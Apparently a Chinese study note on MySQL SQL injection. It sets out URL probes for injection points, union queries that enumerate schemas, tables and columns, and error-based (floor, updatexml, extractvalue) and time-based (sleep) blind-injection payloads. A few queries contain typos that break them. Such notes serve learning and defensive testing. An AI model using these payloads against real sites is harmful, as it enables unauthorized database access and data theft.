MySQL数据库初始的数据库有：

information_schema，mysql，performance_schema与test。

SQL注入难点：盲注，延时注入，文件导出；

在有些浏览器中，可以使用'--+'进行注释但不能使用'#'；

SQL注入实质：就我自己而言所理解的SQL注入是注入的内容与前面的SQL语句重新构造成一个新的SQL语句来完成自己的需求。

SQL注入刚开始时要判断是否有注入点；

常用的判断方法（url）：

/?id=1--+

/?id=1'--+

/?id=1"--+

/?id=1')--+

/?id=0' or 1=1--+

/?id=1' and 1=0--+

常用函数：

1. version()——MySQL 版本

2. user()——数据库用户名

3. database()——数据库名

4. @@datadir——数据库路径

5. @@version_compile_os——操作系统版本

常用连接函数：

1. concat(str1,str2,...)——没有分隔符地连接字符串

2. concat_ws(separator,str1,str2,...)——含有分隔符地连接字符串

3. group_concat(str1,str2,...)——连接一个组的所有字符串，并以逗号分隔每一条数据

排序（order by）

如果我们需要对读取的数据进行排序，我们就可以使用 MySQL 的order by子句来设定你想按哪个字段哪种方式来进行排序，再返回搜索结果

order by使用：

你可以使用任何字段来作为排序的条件，从而返回排序后的查询结果。

 默认情况下，它是按升序排列。

你可以添加 WHERE...LIKE 子句来设置条件。

联合查询：

union操作符：

union操作符用于合并两个或多个select语句的结果集。

union内部的select语句必须拥有相同数量的列。列也必须拥有相似的数据类型。

每条select语句中的列的顺序必须相同。

多个select语句会删除重复的数据。

联合查询需要建立在有显示位的基础上。输入id=0（-1）的原因是如果输入一个有意义的值，那么网页就会返回一个相应的值，这时，它会覆盖后面联合查询出的结果，所以要用一个无意义的值来避免覆盖。我们在知道显示位的时候可以在相应的位置写入希望查询的语句。

查询函数：

group_concat：将数据呈一行显示，有的时候数据过多没办法使用的时候可以用limit来对输出的数据进行限制。

db_name：你想查找的数据库的名字

tb_name：你想查找的数据表的名字

col_name：你想查找的字段的名字（字段=列）

常用查询语句：

查询所有数据库名：

select group_concat(schema_name) from information_schema.schemata

查询当前数据库：
select database()；

查询数据库的所有数据表：

select group_concat(table_name) from information_schema.tables where table_schema='db_name'

查询字段名：

1.select group_concat(column_name) from infromation_schema.columns where table_schema='db_name' and table_name='tb_name'

2.Select column_name from information_schema.columns where table_name='dbname'

查询数据：select group_concat(col_name) from db_name.tb_name

盲注

盲注的分类：

基于布尔 SQL 盲注

基于时间的 SQL 盲注

基于报错的 SQL 盲注

盲注常用的函数：

mid()函数

mid(string,start,length)

mid(a,b,c)从位置 b 开始，截取 a 字符串的 c 位

substr()函数

substr(string,start,length)

substr(a,b,c)从 b 位置开始，截取字符串 a 的 c 长度。Ascii()将某个字符转换为 ascii 值

left()函数

left(string,length)

left(database(),1)>’s’           //database()显示数据库名称，left(a,b)从左侧截取 a 的前 b 位

string：规定要返回的字符串。

start：规定在字符串的何处开始(初始值为1)。

length：规定被返回字符串的长度(可以省略，若省略则返回剩余所有文本)。

在比较的时候可以直接使用单引号>‘s’，也可以先转换位ascii码的形式再进行比较。

布尔盲注的原理是根据页面返回的是true还是false来判断比较的字母是否正确。例如，如果数据库的第一个字母在ASCII表中小于与100相对应的字母，那么就会返回正常情况下的成功页面；如果不小于的话，就会返回错误的页面。

报错注入：

报错注入也是盲注的一种，应该为基于盲注的报错注入。目的是构造 payload 让信息通过错误提示回显出来。

常用报错方式：

floor报错：

▲and (select 1 from(select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a) 

floor()函数原本为向下取整，其中rand()函数为随机数生成，不能于order by共用，数据记录必须有两条以上

▲Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))

a from information_schema.columns group by a;

▲select count(*) from information_schema.tables group by concat(version(),

floor(rand(0)*2))

▲select count(*) from (select 1 union select null unionselect !1) group by concat(version(),floor(rand(0)*2))

此处有三个点，一是需要 concat 计数，二是 floor，取得 0 or 1，进行数据的重复，三是 group by 进行分组，但具体原理解释不是很通，大致原理为分组后数据计数时重复造成的错误。

updatexml报错：

and updatexml(1,payload,1)

语句对payload的返回类型做了限制，只有在payload返回的不是xml格式才会生效，查询时使用的concat()函数是将其连成一个字符串，因此不会符合XPATH_string的格式，从而出现格式错误，出现查询结果。

updatexml(1,concat(0x7e,(select @@version),0x7e),1)

//mysql 对 xml 数据进行查询和修改的 xpath 函数，xpath 语法错误

extractvalue()报错：

and extractvalue(1, payload)

其中payload是想要输入的查询子句。

extractvalue(1,concat(0x7e,(select @@version),0x7e))

//mysql 对 xml 数据进行查询和修改的 xpath 函数，xpath 语法错误

报错注入我使用的并不熟练，在此感谢大佬的文章SQL注入大法 - 简书

延时注入

sleep(n)：网页延迟n秒输出结果；

if(a,b,c)：if判断句，a为条件，b、c为执行语句；如果a为真就执行b，a为假就执行c;

length（database())：返回当前数据库名长度;

If(ascii(substr(database(),1,1))>115,0,sleep(5))--+

//if 判断语句，条件为假，执行 sleep

以上所述只是简单的基础操作，在实际的SQL注入中还有许多需要注意的问题。

如：导入导出，宽字节注入……

但基础操作和中心思想却没有大的变化。